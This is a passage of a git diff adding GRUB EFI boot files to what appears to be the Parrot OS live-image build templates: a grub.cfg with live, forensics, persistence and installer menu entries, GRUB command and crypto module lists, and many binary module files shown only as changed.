a/modules/parrot-build/templates/common/includes.binary/boot/efi.img b/modules/parrot-build/templates/common/includes.binary/boot/efi.img new file mode 100644 index 00000000..9ea55df2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/efi.img differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/dejavu-bold-14.pf2 b/modules/parrot-build/templates/common/includes.binary/boot/grub/dejavu-bold-14.pf2 new file mode 100644 index 00000000..9b093b20 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/dejavu-bold-14.pf2 differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/dejavu-bold-16.pf2 b/modules/parrot-build/templates/common/includes.binary/boot/grub/dejavu-bold-16.pf2 new file mode 100644 index 00000000..11e7f7ab Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/dejavu-bold-16.pf2 differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/efi.img b/modules/parrot-build/templates/common/includes.binary/boot/grub/efi.img new file mode 100644 index 00000000..9ea55df2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/efi.img differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/grub.cfg b/modules/parrot-build/templates/common/includes.binary/boot/grub/grub.cfg new file mode 100644 index 00000000..b999cff8 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/grub.cfg @@ -0,0 +1,126 @@ +set default=0 + +loadfont $prefix/dejavu-bold-16.pf2 +loadfont $prefix/dejavu-bold-14.pf2 +loadfont $prefix/unicode.pf2 +set gfxmode=auto +insmod all_video +insmod gfxterm +insmod png + +set color_normal=cyan/black +set color_highlight=white/blue + +if [ -e /isolinux/splash.png ]; then + # binary_syslinux modifies the theme file to point to the correct + # background picture + set theme=/boot/grub/live-theme/theme.txt +elif [ -e /boot/grub/splash.png ]; then + set theme=/boot/grub/live-theme/theme.txt +else + set menu_color_normal=cyan/blue + set menu_color_highlight=white/blue +fi + +terminal_output gfxterm + +insmod play +play 960 440 1 0 4 440 1 + +# Live boot +menuentry "Live" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount apparmor=0 + initrd /live/initrd.img +} + +menuentry "Text" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount systemd.unit=multi-user.target apparmor=0 + initrd /live/initrd.img +} + +menuentry "RAM mode" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount toram apparmor=0 + initrd /live/initrd.img +} + +menuentry "Forensics mode" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount noswap noautomount apparmor=0 + initrd /live/initrd.img +} +menuentry "Persistence" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount persistence apparmor=0 + initrd /live/initrd.img +} +menuentry "Encrypted persistence" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount persistent=cryptsetup persistence-encryption=luks persistence apparmor=0 + initrd /live/initrd.img +} + +menuentry "Failsafe (nomodeset)" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount nomodeset apparmor=0 + initrd /live/initrd.img +} + +menuentry "Failsafe (disable nvdia/amd gpu)" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount nouveau.modeset=0 nvidia.modeset=0 radeon.modeset=0 apparmor=0 + initrd /live/initrd.img +} + +menuentry "Failsafe (strong errors prevention)" { + linux /live/vmlinuz boot=live hostname=parrot splash noautomount config memtest noapic noapm nodma nomce nolapic nomodeset nosplash vga=normal apparmor=0 + initrd /live/initrd.img +} + +# Installer (if any) +menuentry "Installer" { + linux /install/vmlinuz vga=normal quiet + initrd /install/initrd.gz +} + +menuentry "GTK Installer" { + linux /install/gtk/vmlinuz video=vesa:ywrap,mtrr vga=768 quiet + initrd /install/gtk/initrd.gz +} + + +submenu 'Advanced options...' { + +# More installer entries (if any) +menuentry "Install in graphical mode" { + linux /install/gtk/vmlinuz video=vesa:ywrap,mtrr vga=788 quiet + initrd /nstall/gtk/initrd.gz +} +menuentry "Install in text mode" { + linux /install/vmlinuz vga=normal quiet + initrd /nstall/initrd.gz +} +menuentry "Expert install in graphical mode" { + linux /install/gtk/vmlinuz priority=low video=vesa:ywrap,mtrr vga=788 quiet + initrd /nstall/gtk/initrd.gz +} +menuentry "Expert install in text mode" { + linux /install/vmlinuz priority=low vga=normal quiet + initrd /nstall/initrd.gz +} +menuentry "Automatic install in graphical mode" { + linux /install/gtk/vmlinuz auto=true priority=critical video=vesa:ywrap,mtrr vga=788 quiet + initrd /nstall/gtk/initrd.gz +} +menuentry "Automatic install in text mode" { + linux /install/vmlinuz auto=true priority=critical vga=normal quiet + initrd /nstall/initrd.gz +} +menuentry "Rescue system in graphical mode" { + linux /install/gtk/vmlinuz rescue/enable=true video=vesa:ywrap,mtrr vga=788 + initrd /nstall/gtk/initrd.gz +} +menuentry "Rescue system in text mode" { + linux /install/vmlinuz rescue/enable=true vga=normal + initrd /nstall/initrd.gz +} + + +# Memtest (if any) + + +} diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/acpi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/acpi.mod new file mode 100644 index 00000000..b59d248f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/acpi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/adler32.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/adler32.mod new file mode 100644 index 00000000..68360bd1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/adler32.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ahci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ahci.mod new file mode 100644 index 00000000..86ad1cc8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ahci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/all_video.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/all_video.mod new file mode 100644 index 00000000..d435f903 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/all_video.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/aout.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/aout.mod new file mode 100644 index 00000000..3d2d121d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/aout.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/appleldr.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/appleldr.mod new file mode 100644 index 00000000..deed09a6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/appleldr.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/archelp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/archelp.mod new file mode 100644 index 00000000..2be0ab79 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/archelp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/at_keyboard.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/at_keyboard.mod new file mode 100644 index 00000000..0a6f4cdf Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/at_keyboard.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ata.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ata.mod new file mode 100644 index 00000000..f6d9d4e9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ata.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/backtrace.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/backtrace.mod new file mode 100644 index 00000000..ec2ab711 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/backtrace.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bfs.mod new file mode 100644 index 00000000..6a3992f5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bitmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bitmap.mod new file mode 100644 index 00000000..59c83d37 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bitmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bitmap_scale.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bitmap_scale.mod new file mode 100644 index 00000000..c411feaa Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bitmap_scale.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/blocklist.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/blocklist.mod new file mode 100644 index 00000000..251c98c7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/blocklist.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/boot.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/boot.mod new file mode 100644 index 00000000..b98173ae Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/boot.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bsd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bsd.mod new file mode 100644 index 00000000..2fa7c489 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bsd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bswap_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bswap_test.mod new file mode 100644 index 00000000..89c21142 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bswap_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/btrfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/btrfs.mod new file mode 100644 index 00000000..d8b2d06b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/btrfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bufio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bufio.mod new file mode 100644 index 00000000..2ffc57a2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/bufio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cat.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cat.mod new file mode 100644 index 00000000..42336424 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cat.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbfs.mod new file mode 100644 index 00000000..4dbd6f4d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbls.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbls.mod new file mode 100644 index 00000000..0510150d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbls.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbmemc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbmemc.mod new file mode 100644 index 00000000..55d4403d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbmemc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbtable.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbtable.mod new file mode 100644 index 00000000..544645aa Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbtable.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbtime.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbtime.mod new file mode 100644 index 00000000..a2d44fd2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cbtime.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/chain.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/chain.mod new file mode 100644 index 00000000..4ad935b7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/chain.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmdline_cat_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmdline_cat_test.mod new file mode 100644 index 00000000..95d5d9ae Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmdline_cat_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmp.mod new file mode 100644 index 00000000..799ea980 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmp_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmp_test.mod new file mode 100644 index 00000000..f9d6d874 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cmp_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/command.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/command.lst new file mode 100644 index 00000000..1f2ff86b --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/command.lst @@ -0,0 +1,193 @@ +*acpi: acpi +*all_functional_test: functional_test +*background_image: gfxterm_background +*cat: cat +*cpuid: cpuid +*crc: hashsum +*cryptomount: cryptodisk +*echo: echo +*extract_syslinux_entries_configfile: syslinuxcfg +*extract_syslinux_entries_source: syslinuxcfg +*file: file +*functional_test: functional_test +*gettext: gettext +*hashsum: hashsum +*hdparm: hdparm +*hello: hello +*help: help +*hexdump: hexdump +*inb: iorw +*inl: iorw +*inw: iorw +*keystatus: keystatus +*kfreebsd: bsd +*knetbsd: bsd +*kopenbsd: bsd +*list_env: loadenv +*load_env: loadenv +*loopback: loopback +*ls: ls +*lsacpi: lsacpi +*lspci: lspci +*md5sum: hashsum +*menuentry: normal +*pcidump: pcidump +*probe: probe +*read_byte: memrw +*read_dword: memrw +*read_word: memrw +*regexp: regexp +*save_env: loadenv +*search: search +*serial: serial +*setpci: setpci +*sha1sum: hashsum +*sha256sum: hashsum +*sha512sum: hashsum +*sleep: sleep +*submenu: normal +*syslinux_configfile: syslinuxcfg +*syslinux_source: syslinuxcfg +*terminfo: terminfo +*test_blockarg: test_blockarg +*testspeed: testspeed +*tr: tr +*trust: verify +*verify_detached: verify +*xnu_splash: xnu +*zfskey: zfscrypt +.: configfile +[: test +appleloader: appleldr +authenticate: normal +background_color: gfxterm_background +backtrace: backtrace +badram: mmap +blocklist: blocklist +boot: boot +break: normal +cat: minicmd +cbmemc: cbmemc +chainloader: chain +clear: normal +cmp: cmp +configfile: configfile +continue: normal +coreboot_boottime: cbtime +cutmem: mmap +date: date +distrust: verify +dump: minicmd +eval: eval +exit: minicmd +export: normal +extract_entries_configfile: configfile +extract_entries_source: configfile +extract_legacy_entries_configfile: legacycfg +extract_legacy_entries_source: legacycfg +fakebios: loadbios +false: true +fix_video: fixvideo +fwsetup: efifwsetup +gdbstub: gdb +gdbstub_break: gdb +gdbstub_stop: gdb +gptsync: gptsync +halt: halt +help: minicmd +hexdump_random: random +initrd16: linux16 +initrd: linux +initrdefi: linuxefi +keymap: keylayouts +kfreebsd_loadenv: bsd +kfreebsd_module: bsd +kfreebsd_module_elf: bsd +knetbsd_module: bsd +knetbsd_module_elf: bsd +kopenbsd_ramdisk: bsd +legacy_check_password: legacycfg +legacy_configfile: legacycfg +legacy_initrd: legacycfg +legacy_initrd_nounzip: legacycfg +legacy_kernel: legacycfg +legacy_password: legacycfg +legacy_source: legacycfg +linux16: linux16 +linux: linux +linuxefi: linuxefi +list_trusted: verify +loadbios: loadbios +loadfont: font +lscoreboot: cbls +lsefi: lsefi +lsefimmap: lsefimmap +lsefisystab: lsefisystab +lsfonts: font +lsmmap: lsmmap +lsmod: minicmd +lssal: lssal +macppcbless: macbless +mactelbless: macbless +module2: multiboot2 +module: multiboot +multiboot2: multiboot2 +multiboot: multiboot +nativedisk: nativedisk +net_add_addr: net +net_add_dns: net +net_add_route: net +net_bootp6: net +net_bootp: net +net_del_addr: net +net_del_dns: net +net_del_route: net +net_get_dhcp_option: net +net_ipv6_autoconf: net +net_ls_addr: net +net_ls_cards: net +net_ls_dns: net +net_ls_routes: net +net_nslookup: net +normal: normal +normal_exit: normal +outb: iorw +outl: iorw +outw: iorw +parttool: parttool +password: password +password_pbkdf2: password_pbkdf2 +play: play +read: read +reboot: reboot +return: normal +rmmod: minicmd +search.file: search_fs_file +search.fs_label: search_label +search.fs_uuid: search_fs_uuid +setparams: normal +shift: normal +source: configfile +terminal_input: terminal +terminal_output: terminal +test: test +testload: testload +time: time +true: true +usb: usbtest +videoinfo: videoinfo +videotest: videotest +write_byte: memrw +write_dword: memrw +write_word: memrw +xnu_devprop_load: xnu +xnu_kernel64: xnu +xnu_kernel: xnu +xnu_kext: xnu +xnu_kextdir: xnu +xnu_mkext: xnu +xnu_ramdisk: xnu +xnu_resume: xnu +xnu_uuid: xnu_uuid +zfs-bootfs: zfsinfo +zfsinfo: zfsinfo diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpio.mod new file mode 100644 index 00000000..e6b2f8f6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpio_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpio_be.mod new file mode 100644 index 00000000..47bd5f71 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpio_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpuid.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpuid.mod new file mode 100644 index 00000000..7ab9c4bf Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cpuid.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crc64.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crc64.mod new file mode 100644 index 00000000..38a88ce7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crc64.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crypto.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crypto.lst new file mode 100644 index 00000000..77d9efc0 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crypto.lst @@ -0,0 +1,45 @@ +RIJNDAEL: gcry_rijndael +RIJNDAEL192: gcry_rijndael +RIJNDAEL256: gcry_rijndael +AES128: gcry_rijndael +AES-128: gcry_rijndael +AES-192: gcry_rijndael +AES-256: gcry_rijndael +ADLER32: adler32 +CRC64: crc64 +ARCFOUR: gcry_arcfour +BLOWFISH: gcry_blowfish +CAMELLIA128: gcry_camellia +CAMELLIA192: gcry_camellia +CAMELLIA256: gcry_camellia +CAST5: gcry_cast5 +CRC32: gcry_crc +CRC32RFC1510: gcry_crc +CRC24RFC2440: gcry_crc +DES: gcry_des +3DES: gcry_des +DSA: gcry_dsa +IDEA: gcry_idea +MD4: gcry_md4 +MD5: gcry_md5 +RFC2268_40: gcry_rfc2268 +AES: gcry_rijndael +AES192: gcry_rijndael +AES256: gcry_rijndael +RIPEMD160: gcry_rmd160 +RSA: gcry_rsa +SEED: gcry_seed +SERPENT128: gcry_serpent +SERPENT192: gcry_serpent +SERPENT256: gcry_serpent +SHA1: gcry_sha1 +SHA224: gcry_sha256 +SHA256: gcry_sha256 +SHA512: gcry_sha512 +SHA384: gcry_sha512 +TIGER192: gcry_tiger +TIGER: gcry_tiger +TIGER2: gcry_tiger +TWOFISH: gcry_twofish +TWOFISH128: gcry_twofish +WHIRLPOOL: gcry_whirlpool diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crypto.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crypto.mod new file mode 100644 index 00000000..0bdb4671 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/crypto.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cryptodisk.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cryptodisk.mod new file mode 100644 index 00000000..7cdf4de1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cryptodisk.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cs5536.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cs5536.mod new file mode 100644 index 00000000..82eff392 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/cs5536.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ctz_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ctz_test.mod new file mode 100644 index 00000000..1fdbaeb4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ctz_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/date.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/date.mod new file mode 100644 index 00000000..cce886b3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/date.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/datehook.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/datehook.mod new file mode 100644 index 00000000..b501b02a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/datehook.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/datetime.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/datetime.mod new file mode 100644 index 00000000..0994e52a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/datetime.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/disk.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/disk.mod new file mode 100644 index 00000000..8150c1e8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/disk.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/diskfilter.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/diskfilter.mod new file mode 100644 index 00000000..c73ee6fc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/diskfilter.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/div.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/div.mod new file mode 100644 index 00000000..1102fa22 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/div.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/div_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/div_test.mod new file mode 100644 index 00000000..aeddd718 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/div_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/dm_nv.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/dm_nv.mod new file mode 100644 index 00000000..3d1757d8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/dm_nv.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/echo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/echo.mod new file mode 100644 index 00000000..d99bf328 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/echo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efi_gop.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efi_gop.mod new file mode 100644 index 00000000..4b05e32b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efi_gop.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efi_uga.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efi_uga.mod new file mode 100644 index 00000000..8bed98d0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efi_uga.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efifwsetup.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efifwsetup.mod new file mode 100644 index 00000000..36de227f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efifwsetup.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efinet.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efinet.mod new file mode 100644 index 00000000..74dd3f4e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/efinet.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ehci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ehci.mod new file mode 100644 index 00000000..60b7403d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ehci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/elf.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/elf.mod new file mode 100644 index 00000000..1a7257ea Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/elf.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/eval.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/eval.mod new file mode 100644 index 00000000..e509ab82 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/eval.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/exfat.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/exfat.mod new file mode 100644 index 00000000..0f8cab63 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/exfat.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/exfctest.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/exfctest.mod new file mode 100644 index 00000000..65b54a95 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/exfctest.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ext2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ext2.mod new file mode 100644 index 00000000..0e116370 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ext2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/extcmd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/extcmd.mod new file mode 100644 index 00000000..d6e24cbb Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/extcmd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fat.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fat.mod new file mode 100644 index 00000000..71de34f3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fat.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/file.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/file.mod new file mode 100644 index 00000000..352ec152 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/file.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fixvideo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fixvideo.mod new file mode 100644 index 00000000..bf314582 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fixvideo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/font.mod 